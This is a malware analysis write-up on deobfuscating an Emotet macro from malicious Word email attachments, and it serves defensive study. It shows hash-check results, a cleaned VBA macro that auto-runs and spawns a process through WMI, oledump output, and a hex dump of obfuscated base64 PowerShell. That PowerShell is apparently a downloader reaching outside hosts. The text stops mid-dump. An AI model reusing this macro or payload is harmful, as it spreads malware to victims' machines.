2019-10-16 Emotet maldoc deobfuscated

This sample is from a batch of emotet emails that I found in the email filters back on Monday afternoon (2019-10-14). While all the documents had a different hash (attached to this write-up), the macro that was executed was the same. Based on the URLs found in this sample, this looks like it was from “epoch 2” of emotet as documented here. This write-up is to document how I managed to deobfuscate the macro script.

Artifacts
===========

 
_________   _    _   ______  _____  ______                                   
| | | | | \ | |  | | | |  \ \  | |  | |  \ \     /.)                          
| | | | | | | |  | | | |  | |  | |  | |  | |    /)\|                          
|_| |_| |_| \_|__|_| |_|  |_| _|_|_ |_|  |_|   // /                           
                                              /'" "                           
                                                                              
Online Hash Checker for Virustotal and Other Services                         
Florian Roth - 0.13.0 April 2019                                                                                                                         
 
[+] Found results CSV from previous run: check-results_attach.csv
[+] Appending results to file: check-results_attach.csv
[ ] Processing /attach/Report.doc ...
[ ] Processing /attach/File72290.doc ...
[ ] Processing /attach/Online Payment October 2019.doc ...
[ ] Processing /attach/BL-1326 report p2.doc ...
[ ] Processing /attach/FA_10063455599_10142019.doc ...
[+] Processing 5 lines ...

 1 / 5 ] Unknown                                                                
HASH: fe03ad92a84a4921f451efe03720355bc824ff6ae8adef6db61df37d8f55fc02 COMMENT: /attach/Report.doc
RESULT: - / -

 2 / 5 ] Malicious                                                              
HASH: 178c41b40d0ecfa10d5a5441b4a1ed1c440b6ba64f9042afb5b0c073cdcab8ec COMMENT: /attach/File72290.doc
VIRUS: Microsoft: TrojanDownloader:O97M/Emotet.OB!MTB / Kaspersky: HEUR:Trojan.MSOffice.SAgent.gen / McAfee: W97M/Downloader!D09F6CFB8412 / TrendMicro: Trojan.W97M.POWLOAD.TIOIBEGP / ESET-NOD32: GenScript.GKX / Symantec: W97M.Downloader / F-Secure: Malware.VBA/Dldr.Agent.terye / Sophos: Troj/DocDl-VUL / GData: Macro.Trojan-Downloader.Posh.Z@gen
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-10-15 07:01:45 COMMENTS: 0 USERS: -
RESULT: 31 / 59

 3 / 5 ] Unknown                                                                
HASH: 01291b7e28a3ca3bfc682db156da1ba29aa55c84c4e88cb8682c43a06c94041d COMMENT: /attach/Online Payment October 2019.doc
RESULT: - / -

 4 / 5 ] Malicious                                                              
HASH: 63e1801ee2c4b9fd49980188f100d78efb85c360a5772a4eeafce7eee56c3d9c COMMENT: /attach/BL-1326 report p2.doc
VIRUS: Microsoft: TrojanDownloader:O97M/Emotet.OB!MTB / Kaspersky: HEUR:Trojan.MSOffice.SAgent.gen / McAfee: W97M/Downloader!09BE00087F6E / TrendMicro: Trojan.W97M.POWLOAD.TIOIBEGP / ESET-NOD32: GenScript.GKZ / Symantec: W97M.Downloader / F-Secure: Malware.VBA/Dldr.Agent.skjrn / Sophos: Troj/DocDl-VVE / GData: Macro.Trojan-Downloader.Posh.Z@gen
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-10-15 10:05:50 COMMENTS: 0 USERS: -
RESULT: 33 / 59

 5 / 5 ] Malicious                                                              
HASH: e856662ba9743307b0729746e88844935cacc1f126cbd2709c5f10916676ebd5 COMMENT: /attach/FA_10063455599_10142019.doc
VIRUS: Microsoft: TrojanDownloader:O97M/Emotet.OB!MTB / Kaspersky: HEUR:Trojan.MSOffice.SAgent.gen / McAfee: W97M/Downloader!7450BFAD04A2 / TrendMicro: Trojan.W97M.POWLOAD.TIOIBEGP / ESET-NOD32: GenScript.GKZ / Symantec: W97M.Downloader / F-Secure: Malware.VBA/Dldr.Agent.isqar / Sophos: Troj/DocDl-VVE / GData: Macro.Trojan-Downloader.Posh.Z@gen
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-10-15 17:26:22 COMMENTS: 0 USERS: -
RESULT: 34 / 59
[!] Sample on CAPE sandbox URL: https://cape.contextis.com/analysis/95085/

Analysis
=========
To make this easier, I decided to use OfficeMalScanner to get the files that contained the macro code. Looking at those files, there was an obvious pattern that could be seen. There is a lot of junk lines that either start with ‘Rem’ or a variable assignment of some sort. All of this was removed to help clean up the script. The following code block is the result of clearing out all the junk code and trying to “beautify” the script for ease of reading.

Attribute VB_Name = "a0xb22b865f2f341e4"
Attribute VB_Control = "a0x350ef9c11d458, 2, 2, MSForms, TextBox"
Attribute VB_Control = "a0x18d5d9a5a483fb9, 1, 1, MSForms, TextBox"

Sub autoopen()
	On Error Resume Next
	a0x1eb0cdf8e1
End Sub

	Function a0x1eb0cdf8e1()
	   On Error Resume Next
	   a0xbd1f3a6476a9 = a0xbd1f3a6476a9 + a0x60a8067fc150d9.Create(a0x25b9289e14e520(a0x25b9289e14e520(a0xb22b865f2f341e4.a0xc3c0a735d5 + a0xb22b865f2f341e4.a0x350ef9c11d458)), a0x12a4b2f54009, a0xd0975bf2bd8b, a0x4c575c5e09847d)
	End Function

		Function a0x60a8067fc150d9()
		   On Error Resume Next
		   Set a0x60a8067fc150d9 = GetObject(a0x25b9289e14e520(a0x25b9289e14e520("6262626262w626262in6262mg62626262mts626262:Win62626262362622_6262Pro626262626262cess")))
		End Function

			Function a0x25b9289e14e520(a0x77daf96f2e1c)
			   On Error Resume Next
			   a0x242df8b65eb52 = "62"
			   a0x25b9289e14e520 = Replace(a0x756d4a94e00d2, a0x242df8b65eb52, "")
			End Function

		Function a0xd0975bf2bd8b()
		   On Error Resume Next
		   Set a0xd0975bf2bd8b = GetObject(a0x25b9289e14e520(a0x25b9289e14e520(a0xb22b865f2f341e4.a0x18d5d9a5a483fb9)))
		   a0xd0975bf2bd8b.ShowWindow = wdLinkNone
		End Function

With this “cleaned” up version of the macro script, one should be able to eyeball what is going on. So we know that as soon as the Word document is opened and the macro is allowed, it calls the function ‘a0x1eb0cdf8e1.’ From there, this function then calls on some other functions to start building the script and removing the number ’62’ from the variable “a0x25b9289e14e520,” which proceeds to give you the statement “winmgmts:Win32_Process.” So now we know that WMI is being called to create a process. Since this is an emotet macro, we know that the MO for these use Powershell that has been base64 encoded. Also, considering that the macro has some textboxes in it, we can make the assumption that the Powershell code can be found there since there are some callouts to those textboxes. The issue is where and how to find it. This is where Didier Stevens’ oledump.py script comes in handy.

Initially I wanted to see the different streams that made up this script. I used the following command to see how the macro was laid out: ./oledump.py /attach/FA_10063455599_10142019.doc. That gave me the following output:

  1:       114 '\x01CompObj'
  2:       332 '\x05DocumentSummaryInformation'
  3:       448 '\x05SummaryInformation'
  4:      7401 '1Table'
  5:     72737 'Data'
  6:       669 'Macros/PROJECT'
  7:     21377 'Macros/VBA/_VBA_PROJECT'
  8:      1898 'Macros/VBA/__SRP_0'
  9:       317 'Macros/VBA/__SRP_1'
 10:      1040 'Macros/VBA/__SRP_2'
 11:       300 'Macros/VBA/__SRP_3'
 12: m     690 'Macros/VBA/a0x15ad172fde'
 13: M   57615 'Macros/VBA/a0x674c6739d8b46'
 14: M   44518 'Macros/VBA/a0xa82b849347'
 15: m    1988 'Macros/VBA/a0xb22b865f2f341e4'
 16:       981 'Macros/VBA/dir'
 17:        36 'ObjectPool/_1632577978/\x03OCXNAME'
 18:        72 'ObjectPool/_1632577978/contents'
 19:        40 'ObjectPool/_1632577979/\x03OCXNAME'
 20:       156 'ObjectPool/_1632577979/contents'
 21:        36 'ObjectPool/_1632577980/\x03OCXNAME'
 22:      3776 'ObjectPool/_1632577980/contents'
 23:        30 'ObjectPool/_1632577981/\x03OCXNAME'
 24:        76 'ObjectPool/_1632577981/contents'
 25:        30 'ObjectPool/_1632577982/\x03OCXNAME'
 26:       112 'ObjectPool/_1632577982/contents'
 27:        34 'ObjectPool/_1632577983/\x03OCXNAME'
 28:        72 'ObjectPool/_1632577983/contents'
 29:      4142 'WordDocument'

Since we already have the bulk of the script and just need to figure out where the Powershell code is, I start looking at the “ObjectPool” paying attention to how large they are (seen in the third column). The first one that I focus on is stream 22 (‘ObjectPool/_1632577980/contents’). So using this command: ./oledump.py -s 22 /attach/FA_10063455599_10142019.doc I can see what appears to be a large amount of base64 data. As a side note, as of late, emotet has been using a base64 encoded Powershell command that starts with ‘PAA…’ which is a great indicator of what you are dealing with. This will most likely change, but as of right now this seems to be the norm.

00000000: 00 02 A0 0E 01 01 40 80  00 00 00 00 1B 48 80 2C  ......@......H.,
00000010: 86 0E 00 80 1A 00 00 00  1A 00 00 00 50 41 41 6A  ............PAAj
00000020: 36 32 41 43 41 41 36 32  61 41 42 30 36 32 41 48  62ACAA62aAB062AH
00000030: 51 41 36 32 63 41 42 7A  36 32 41 44 6F 41 36 32  QA62cABz62ADoA62
00000040: 4C 77 41 76 36 32 41 48  63 41 36 32 64 77 42 33  LwAv62AHcA62dwB3
00000050: 36 32 41 43 34 41 36 32  62 51 42 70 36 32 41 47  62AC4A62bQBp62AG
00000060: 4D 41 36 32 63 67 42 76  36 32 41 48 4D 41 36 32  MA62cgBv62AHMA62
00000070: 62 77 42 6D 36 32 41 48  51 41 36 32 4C 67 42 6A  bwBm62AHQA62LgBj
00000080: 36 32 41 47 38 41 36 32  62 51 41 76 36 32 41 43  62AG8A62bQAv62AC
00000090: 41 41 36 32 49 77 41 2B  36 32 41 43 41 41 36 32  AA62IwA+62ACAA62
000000A0: 4A 41 42 68 36 32 41 44  41 41 36 32 65 41 42 6D  JABh62ADAA62eABm
000000B0: 36 32 41 44 41 41 36 32  4E 51 41 31 36 32 41 44  62ADAA62NQA162AD
000000C0: 41 41 36 32 5A 67 41 79  36 32 41 47 55 41 36 32  AA62ZgAy62AGUA62
000000D0: 4E 51 41 32 36 32 41 47  51 41 36 32 5A 41 42 6A  NQA262AGQA62ZABj
000000E0: 36 32 41 44 30 41 36 32  4A 77 42 68 36 32 41 44  62AD0A62JwBh62AD
000000F0: 41 41 36 32 65 41 41 78  36 32 41 47 55 41 36 32  AA62eAAx62AGUA62
00000100: 4E 77 41 33 36 32 41 47  49 41 36 32 4F 41 41 31  NwA362AGIA62OAA1
00000110: 36 32 41 44 45 41 36 32  5A 41 41 30 36 32 41 43  62ADEA62ZAA062AC
00000120: 63 41 36 32 4F 77 41 6B  36 32 41 47 45 41 36 32  cA62OwAk62AGEA62
00000130: 4D 41 42 34 36 32 41 47  49 41 36 32 4D 67 42 6A  MAB462AGIA62MgBj
00000140: 36 32 41 47 4D 41 36 32  4E 77 42 6B 36 32 41 44  62AGMA62NwBk62AD
00000150: 41 41 36 32 4D 67 41 7A  36 32 41 44 6B 41 36 32  AA62MgAz62ADkA62
00000160: 49 41 41 39 36 32 41 43  41 41 36 32 4A 77 41 7A  IAA962ACAA62JwAz
00000170: 36 32 41 44 45 41 36 32  4E 77 41 6E 36 32 41 44  62ADEA62NwAn62AD
00000180: 73 41 36 32 4A 41 42 68  36 32 41 44 41 41 36 32  sA62JABh62ADAA62
00000190: 65 41 41 35 36 32 41 44  6B 41 36 32 4F 41 42 6D  eAA562ADkA62OABm
000001A0: 36 32 41 44 45 41 36 32  4F 41 41 30 36 32 41 44  62ADEA62OAA062AD
000001B0: 49 41 36 32 4D 67 42 6C  36 32 41 44 4D 41 36 32  IA62MgBl62ADMA62
000001C0: 5A 67 41 39 36 32 41 43  63 41 36 32 59 51 41 77  ZgA962ACcA62YQAw
000001D0: 36 32 41 48 67 41 36 32  59 67 42 68 36 32 41 44  62AHgA62YgBh62AD
000001E0: 55 41 36 32 4E 51 42 6D  36 32 41 44 41 41 36 32  UA62NQBm62ADAA62
000001F0: 4D 77 42 69 36 32 41 47  55 41 36 32 4D 77 42 69  MwBi62AGUA62MwBi
00000200: 36 32 41 44 49 41 36 32  4D 51 42 6B 36 32 41 47  62ADIA62MQBk62AG
00000210: 45 41 36 32 4A 77 41 37  36 32 41 43 51 41 36 32  EA62JwA762ACQA62
00000220: 59 51 41 77 36 32 41 48  67 41 36 32 4F 51 42 68  YQAw62AHgA62OQBh
00000230: 36 32 41 44 49 41 36 32  59 67 41 31 36 32 41 47  62ADIA62YgA162AG
00000240: 45 41 36 32 4D 51 41 7A  36 32 41 44 4D 41 36 32  EA62MQAz62ADMA62
00000250: 4F 41 42 6D 36 32 41 44  55 41 36 32 4D 41 41 39  OABm62ADUA62MAA9
00000260: 36 32 41 43 51 41 36 32  5A 51 42 75 36 32 41 48  62ACQA62ZQBu62AH
00000270: 59 41 36 32 4F 67 42 31  36 32 41 48 4D 41 36 32  YA62OgB162AHMA62
00000280: 5A 51 42 79 36 32 41 48  41 41 36 32 63 67 42 76  ZQBy62AHAA62cgBv
00000290: 36 32 41 47 59 41 36 32  61 51 42 73 36 32 41 47  62AGYA62aQBs62AG
000002A0: 55 41 36 32 4B 77 41 6E  36 32 41 46 77 41 36 32  UA62KwAn62AFwA62
000002B0: 4A 77 41 72 36 32 41 43  51 41 36 32 59 51 41 77  JwAr62ACQA62YQAw
000002C0: 36 32 41 48 67 41 36 32  59 67 41 79 36 32 41 47  62AHgA62YgAy62AG
000002D0: 4D 41 36 32 59 77 41 33  36 32 41 47 51 41 36 32  MA62YwA362AGQA62
000002E0: 4D 41 41 79 36 32 41 44  4D 41 36 32 4F 51 41 72  MAAy62ADMA62OQAr
000002F0: 36 32 41 43 63 41 36 32  4C 67 42 6C 36 32 41 48  62ACcA62LgBl62AH
00000300: 67 41 36 32 5A 51 41 6E  36 32 41 44 73 41 36 32  gA62ZQAn62ADsA62
00000310: 4A 41 42 68 36 32 41 44  41 41 36 32 65 41 41 77  JABh62ADAA62eAAw
00000320: 36 32 41 44 51 41 36 32  4F 51 41 34 36 32 41 44  62ADQA62OQA462AD
00000330: 55 41 36 32 5A 41 41 33  36 32 41 47 49 41 36 32  UA62ZAA362AGIA62
00000340: 4E 51 41 33 36 32 41 44  30 41 36 32 4A 77 42 68  NQA362AD0A62JwBh
00000350: 36 32 41 44 41 41 36 32  65 41 41 79 36 32 41 47  62ADAA62eAAy62AG
00000360: 45 41 36 32 4F 41 41 78  36 32 41 47 51 41 36 32  EA62OAAx62AGQA62
00000370: 5A 41 42 68 36 32 41 47  4D 41 36 32 4E 77 41 31  ZABh62AGMA62NwA1
00000380: 36 32 41 47 49 41 36 32  4D 67 42 6C 36 32 41 43  62AGIA62MgBl62AC
00000390: 63 41 36 32 4F 77 41 6B  36 32 41 47 45 41 36 32  cA62OwAk62AGEA62
000003A0: 4D 41 42 34 36 32 41 44  49 41 36 32 5A 51 41 79  MAB462ADIA62ZQAy
000003B0: 36 32 41 44 55 41 36 32  4F 51 42 68 36 32 41 44  62ADUA62OQBh62AD
000003C0: 63 41 36 32 4F 41 41 34  36 32 41 44 51 41 36 32  cA62OAA462ADQA62
000003D0: 50 51 41 6D 36 32 41 43  67 41 36 32 4A 77 42 75  PQAm62ACgA62JwBu
000003E0: 36 32 41 47 55 41 36 32  64 77 41 74 36 32 41 47  62AGUA62dwAt62AG
000003F0: 38 41 36 32 4A 77 41 72  36 32 41 43 63 41 36 32  8A62JwAr62ACcA62
00000400: 59 67 42 71 36 32 41 47  55 41 36 32 4A 77 41 72  YgBq62AGUA62JwAr
00000410: 36 32 41 43 63 41 36 32  59 77 41 6E 36 32 41 43  62ACcA62YwAn62AC
00000420: 73 41 36 32 4A 77 42 30  36 32 41 43 63 41 36 32  sA62JwB062ACcA62
00000430: 4B 51 41 67 36 32 41 47  34 41 36 32 52 51 42 55  KQAg62AG4A62RQBU
00000440: 36 32 41 43 34 41 36 32  56 77 42 6C 36 32 41 45  62AC4A62VwBl62AE
00000450: 49 41 36 32 51 77 42 4D  36 32 41 45 6B 41 36 32  IA62QwBM62AEkA62
00000460: 52 51 42 4F 36 32 41 48  51 41 36 32 4F 77 41 6B  RQBO62AHQA62OwAk
00000470: 36 32 41 47 45 41 36 32  4D 41 42 34 36 32 41 44  62AGEA62MAB462AD
00000480: 59 41 36 32 4E 77 42 6B  36 32 41 47 45 41 36 32  YA62NwBk62AGEA62
00000490: 4E 77 42 6D 36 32 41 44  6B 41 36 32 4F 41 41 79  NwBm62ADkA62OAAy
000004A0: 36 32 41 44 59 41 36 32  4E 67 41 39 36 32 41 43  62ADYA62NgA962AC
000004B0: 63 41 36 32 61 41 42 30  36 32 41 48 51 41 36 32  cA62aAB062AHQA62
000004C0: 63 41 42 7A 36 32 41 44  6F 41 36 32 4C 77 41 76  cABz62ADoA62LwAv
000004D0: 36 32 41 47 59 41 36 32  61 51 42 73 36 32 41 47  62AGYA62aQBs62AG
000004E0: 55 41 36 32 5A 77 42 7A  36 32 41 48 51 41 36 32  UA62ZwBz62AHQA62
000004F0: 4C 67 42 6A 36 32 41 47  38 41 36 32 62 51 41 76  LgBj62AG8A62bQAv
00000500: 36 32 41 48 63 41 36 32  63 41 41 74 36 32 41 47  62AHcA62cAAt62AG
00000510: 45 41 36 32 5A 41 42 74  36 32 41 47 6B 41 36 32  EA62ZABt62AGkA62
00000520: 62 67 41 76 36 32 41 45  73 41 36 32 62 41 41 76  bgAv62AEsA62bAAv
00000530: 36 32 41 43 6F 41 36 32  61 41 42 30 36 32 41 48  62ACoA62aAB062AH
00000540: 51 41 36 32 63 41 42 7A  36 32 41 44 6F 41 36 32  QA62cABz62ADoA62
00000550: 4C 77 41 76 36 32 41 48  63 41 36 32 64 77 42 33  LwAv62AHcA62dwB3
00000560: 36 32 41 43 34 41 36 32  62 51 42 6C 36 32 41 48  62AC4A62bQBl62AH
00000570: 49 41 36 32 59 77 42 6C  36 32 41 47 73 41 36 32  IA62YwBl62AGsA62
00000580: 62 77 41 75 36 32 41 47  4D 41 36 32 62 77 42 74  bwAu62AGMA62bwBt
00000590: 36 32 41 43 38 41 36 32  64 77 42 77 36 32 41 43  62AC8A62dwBw62AC
000005A0: 30 41 36 32 59 77 42 76  36 32 41 47 34 41 36 32  0A62YwBv62AG4A62
000005B0: 64 41 42 6C 36 32 41 47  34 41 36 32 64 41 41 76  dABl62AG4A62dAAv
000005C0: 36 32 41 44 45 41 36 32  5A 51 42 72 36 32 41 44  62ADEA62ZQBr62AD
000005D0: 63 41 36 32 4C 77 41 71  36 32 41 47 67 41 36 32  cA62LwAq62AGgA62
000005E0: 64 41 42 30 36 32 41 48  41 41 36 32 63 77 41 36  dAB062AHAA62cwA6
000005F0: 36 32 41 43 38 41 36 32  4C 77 42 72 36 32 41 47  62AC8A62LwBr62AG
00000600: 45 41 36 32 62 51 42 77  36 32 41 48 55 41 36 32  EA62bQBw62AHUA62
00000610: 63 77 42 74 36 32 41 47  45 41 36 32 62 67 42 70  cwBt62AGEA62bgBp
00000620: 36 32 41 47 45 41 36 32  4C 67 42 6A 36 32 41 47  62AGEA62LgBj62AG
00000630: 38 41 36 32 62 51 41 76  36 32 41 48 63 41 36 32  8A62bQAv62AHcA62
00000640: 63 41 41 74 36 32 41 47  4D 41 36 32 62 77 42 75  cAAt62AGMA62bwBu
00000650: 36 32 41 48 51 41 36 32  5A 51 42 75 36 32 41 48  62AHQA62ZQBu62AH
00000660: 51 41 36 32 4C 77 41 30  36 32 41 47 59 41 36 32  QA62LwA062AGYA62
00000670: 4D 67 42 6A 36 32 41 44  67 41 36 32 4C 77 41 71  MgBj62ADgA62LwAq
00000680: 36 32 41 47 67 41 36 32  64 41 42 30 36 32 41 48  62AGgA62dAB062AH
00000690: 41 41 36 32 63 77 41 36  36 32 41 43 38 41 36 32  AA62cwA662AC8A62
000006A0: 4C 77 42 32 36 32 41 48  41 41 36 32 63 77 41 7A  LwB262AHAA62cwAz
000006B0: 36 32 41 44 4D 41 36 32  4D 77 41 75 36 32 41 47  62ADMA62MwAu62AG
000006C0: 4D 41 36 32 62 77 42 74  36 32 41 43 38 41 36 32  MA62bwBt62AC8A62
000006D0: 4D 41 41 33 36 32 41 47  67 41 36 32 4D 77 41 78  MAA362AGgA62MwAx
000006E0: 36 32 41 43 38 41 36 32  4D 51 42 6E 36 32 41 47  62AC8A62MQBn62AG
000006F0: 6F 41 36 32 65 51 41 35  36 32 41 43 38 41 36 32  oA62eQA562AC8A62
00000700: 4B 67 42 6F 36 32 41 48  51 41 36 32 64 41 42 77  KgBo62AHQA62dABw
00000710: 36 32 41 44 6F 41 36 32  4C 77 41 76 36 32 41 47  62ADoA62LwAv62AG
00000720: 34 41 36 32 64 51 42 30  36 32 41 48 51 41 36 32  4A62dQB062AHQA62
00000730: 62 41 42 6C 36 32 41 47  59 41 36 32 61 51 42 69  bABl62AGYA62aQBi
00000740: 36 32 41 47 55 41 36 32  63 67 42 68 36 32 41 48  62AGUA62cgBh62AH
00000750: 49 41 36 32 64 41 41 75  36 32 41 47 4D 41 36 32  IA62dAAu62AGMA62
00000760: 62 77 42 74 36 32 41 43  38 41 36 32 64 77 42 77  bwBt62AC8A62dwBw
00000770: 36 32 41 43 30 41 36 32  59 51 42 6B 36 32 41 47  62AC0A62YQBk62AG
00000780: 30 41 36 32 61 51 42 75  36 32 41 43 38 41 36 32  0A62aQBu62AC8A62
00000790: 5A 51 42 4A 36 32 41 45  51 41 36 32 51 77 42 68  ZQBJ62AEQA62QwBh
000007A0: 36 32 41 45 38 41 36 32  4C 77 41 6E 36 32 41 43  62AE8A62LwAn62AC
000007B0: 34 41 36 32 49 67 42 7A  36 32 41 46 41 41 36 32  4A62IgBz62AFAA62
000007C0: 59 41 42 4D 36 32 41 47  6B 41 36 32 64 41 41 69  YABM62AGkA62dAAi
000007D0: 36 32 41 43 67 41 36 32  4A 77 41 71 36 32 41 43  62ACgA62JwAq62AC
000007E0: 63 41 36 32 4B 51 41 37  36 32 41 43 51 41 36 32  cA62KQA762ACQA62
000007F0: 59 51 41 77 36 32 41 48  67 41 36 32 4D 77 42 6D  YQAw62AHgA62MwBm
00000800: 36 32 41 44 63 41 36 32  4E 77 41 34 36 32 41 44  62ADcA62NwA462AD
00000810: 49 41 36 32 4E 77 41 7A  36 32 41 47 45 41 36 32  IA62NwAz62AGEA62
00000820: 59 77 41 30 36 32 41 44  55 41 36 32 5A 41 41 39  YwA062ADUA62ZAA9
00000830: 36 32 41 43 63 41 36 32  59 51 41 77 36 32 41 48  62ACcA62YQAw62AH
00000840: 67 41 36 32 4F 51 41 34  36 32 41 44 41 41 36 32  gA62OQA462ADAA62
00000850: 59 67 42 6A 36 32 41 44  67 41 36 32 4D 77 41 78  YgBj62ADgA62MwAx
00000860: 36 32 41 44 4D 41 36 32  5A 67 42 6D 36 32 41 43  62ADMA62ZgBm62AC
00000870: 63 41 36 32 4F 77 42 6D  36 32 41 47 38 41 36 32  cA62OwBm62AG8A62
00000880: 63 67 42 6C 36 32 41 47  45 41 36 32 59 77 42 6F  cgBl62AGEA62YwBo
00000890: 36 32 41 43 67 41 36 32  4A 41 42 68 36 32 41 44  62ACgA62JABh62AD
000008A0: 41 41 36 32 65 41 41 33  36 32 41 44 59 41 36 32  AA62eAA362ADYA62
000008B0: 5A 41 42 69 36 32 41 44  49 41 36 32 4E 41 42 6B  ZABi62ADIA62NABk
000008C0: 36 32 41 44 41 41 36 32  4D 51 41 33 36 32 41 43  62ADAA62MQA362AC
000008D0: 41 41 36 32 61 51 42 75  36 32 41 43 41 41 36 32  AA62aQBu62ACAA62
000008E0: 4A 41 42 68 36 32 41 44  41 41 36 32 65 41 41 32  JABh62ADAA62eAA2
000008F0: 36 32 41 44 63 41 36 32  5A 41 42 68 36 32 41 44  62ADcA62ZABh62AD
00000900: 63 41 36 32 5A 67 41 35  36 32 41 44 67 41 36 32  cA62ZgA562ADgA62
00000910: 4D 67 41 32 36 32 41 44  59 41 36 32 4B 51 42 37  MgA262ADYA62KQB7
00000920: 36 32 41 48 51 41 36 32  63 67 42 35 36 32 41 48  62AHQA62cgB562AH
00000930: 73 41 36 32 4A 41 42 68  36 32 41 44 41 41 36 32  sA62JABh62ADAA62
00000940: 65 41 41 79 36 32 41 47  55 41 36 32 4D 67 41 31  eAAy62AGUA62MgA1
00000950: 36 32 41 44 6B 41 36 32  59 51 41 33 36 32 41 44  62ADkA62YQA362AD
00000960: 67 41 36 32 4F 41 41 30  36 32 41 43 34 41 36 32  gA62OAA062AC4A62
00000970: 49 67 42 45 36 32 41 45  38 41 36 32 59 41 42 58  IgBE62AE8A62YABX
00000980: 36 32 41 47 41 41 36 32  54 67 42 4D 36 32 41 45  62AGAA62TgBM62AE
00000990: 38 41 36 32 51 51 42 67  36 32 41 47 51 41 36 32  8A62QQBg62AGQA62
000009A0: 52 67 42 70 36 32 41 47  77 41 36 32 5A 51 41 69  RgBp62AGwA62ZQAi
000009B0: 36 32 41 43 67 41 36 32  4A 41 42 68 36 32 41 44  62ACgA62JABh62AD
000009C0: 41 41 36 32 65 41 41 33  36 32 41 44 59 41 36 32  AA62eAA362ADYA62
000009D0: 5A 41 42 69 36 32 41 44  49 41 36 32 4E 41 42 6B  ZABi62ADIA62NABk
000009E0: 36 32 41 44 41 41 36 32  4D 51 41 33 36 32 41 43  62ADAA62MQA362AC
000009F0: 77 41 36 32 49 41 41 6B  36 32 41 47 45 41 36 32  wA62IAAk62AGEA62
00000A00: 4D 41 42 34 36 32 41 44  6B 41 36 32 59 51 41 79  MAB462ADkA62YQAy
00000A10: 36 32 41 47 49 41 36 32  4E 51 42 68 36 32 41 44  62AGIA62NQBh62AD
00000A20: 45 41 36 32 4D 77 41 7A  36 32 41 44 67 41 36 32  EA62MwAz62ADgA62
00000A30: 5A 67 41 31 36 32 41 44  41 41 36 32 4B 51 41 37  ZgA162ADAA62KQA7
00000A40: 36 32 41 43 51 41 36 32  59 51 41 77 36 32 41 48  62ACQA62YQAw62AH
00000A50: 67 41 36 32 59 51 41 34  36 32 41 44 63 41 36 32  gA62YQA462ADcA62
00000A60: 59 51 42 68 36 32 41 44  67 41 36 32 4E 41 42 6A  YQBh62ADgA62NABj
00000A70: 36 32 41 47 55 41 36 32  4D 41 41 35 36 32 41 47  62AGUA62MAA562AG
00000A80: 4D 41 36 32 50 51 41 6E  36 32 41 47 45 41 36 32  MA62PQAn62AGEA62
00000A90: 4D 41 42 34 36 32 41 47  51 41 36 32 4E 41 41 34  MAB462AGQA62NAA4
00000AA0: 36 32 41 44 63 41 36 32  5A 41 42 6C 36 32 41 47  62ADcA62ZABl62AG
00000AB0: 51 41 36 32 59 67 41 7A  36 32 41 44 45 41 36 32  QA62YgAz62ADEA62
00000AC0: 4D 67 42 6C 36 32 41 43  63 41 36 32 4F 77 42 4A  MgBl62ACcA62OwBJ
00000AD0: 36 32 41 47 59 41 36 32  49 41 41 6F 36 32 41 43  62AGYA62IAAo62AC
00000AE0: 67 41 36 32 4A 67 41 6F  36 32 41 43 63 41 36 32  gA62JgAo62ACcA62
00000AF0: 52 77 42 6C 36 32 41 48  51 41 36 32 4C 51 42 4A  RwBl62AHQA62LQBJ
00000B00: 36 32 41 43 63 41 36 32  4B 77 41 6E 36 32 41 48  62ACcA62KwAn62AH
00000B10: 51 41 36 32 4A 77 41 72  36 32 41 43 63 41 36 32  QA62JwAr62ACcA62
00000B20: 5A 51 42 74 36 32 41 43  63 41 36 32 4B 51 41 67  ZQBt62ACcA62KQAg
00000B30: 36 32 41 43 51 41 36 32  59 51 41 77 36 32 41 48  62ACQA62YQAw62AH
00000B40: 67 41 36 32 4F 51 42 68  36 32 41 44 49 41 36 32  gA62OQBh62ADIA62
00000B50: 59 67 41 31 36 32 41 47  45 41 36 32 4D 51 41 7A  YgA162AGEA62MQAz
00000B60: 36 32 41 44 4D 41 36 32  4F 41 42 6D 36 32 41 44  62ADMA62OABm62AD
00000B70: 55 41 36 32 4D 41 41 70  36 32 41 43 34 41 36 32  UA62MAAp62AC4A62
00000B80: 49 67 42 4D 36 32 41 47  55 41 36 32 59 41 42 4F  IgBM62AGUA62YABO
00000B90: 36 32 41 47 63 41 36 32  64 41 42 49 36 32 41 43  62AGcA62dABI62AC
00000BA0: 49 41 36 32 49 41 41 74  36 32 41 47 63 41 36 32  IA62IAAt62AGcA62
00000BB0: 5A 51 41 67 36 32 41 44  4D 41 36 32 4D 41 41 7A  ZQAg62ADMA62MAAz
00000BC0: 36 32 41 44 49 41 36 32  4D 77 41 70 36 32 41 43  62ADIA62MwAp62AC
00000BD0: 41 41 36 32 65 77 42 62  36 32 41 45 51 41 36 32  AA62ewBb62AEQA62
00000BE0: 61 51 42 68 36 32 41 47  63 41 36 32 62 67 42 76  aQBh62AGcA62bgBv
00000BF0: 36 32 41 48 4D 41 36 32  64 41 42 70 36 32 41 47  62AHMA62dABp62AG
00000C00: 4D 41 36 32 63 77 41 75  36 32 41 46 41 41 36 32  MA62cwAu62AFAA62
00000C10: 63 67 42 76 36 32 41 47  4D 41 36 32 5A 51 42 7A  cgBv62AGMA62ZQBz
00000C20: 36 32 41 48 4D 41 36 32  58 51 41 36 36 32 41 44  62AHMA62XQA662AD
00000C30: 6F 41 36 32 49 67 42 7A  36 32 41 46 51 41 36 32  oA62IgBz62AFQA62
00000C40: 59 41 42 42 36 32 41 46  49 41 36 32 56 41 41 69  YABB62AFIA62VAAi
00000C50: 36 32 41 43 67 41 36 32  4A 41 42 68 36 32 41 44  62ACgA62JABh62AD
00000C60: 41 41 36 32 65 41 41 35  36 32 41 47 45 41 36 32  AA62eAA562AGEA62
00000C70: 4D 67 42 69 36 32 41 44  55 41 36 32 59 51 41 78  MgBi62ADUA62YQAx
00000C80: 36 32 41 44 4D 41 36 32  4D 77 41 34 36 32 41 47  62ADMA62MwA462AG
00000C90: 59 41 36 32 4E 51 41 77  36 32 41 43 6B 41 36 32  YA62NQAw62ACkA62
00000CA0: 4F 77 41 6B 36 32 41 47  45 41 36 32 4D 41 42 34  OwAk62AGEA62MAB4
00000CB0: 36 32 41 47 55 41 36 32  4D 77 41 33 36 32 41 44  62AGUA62MwA362AD
00000CC0: 67 41 36 32 4D 41 41 33  36 32 41 44 67 41 36 32  gA62MAA362ADgA62
00000CD0: 4D 67 41 31 36 32 41 47  45 41 36 32 59 67 41 30  MgA162AGEA62YgA0
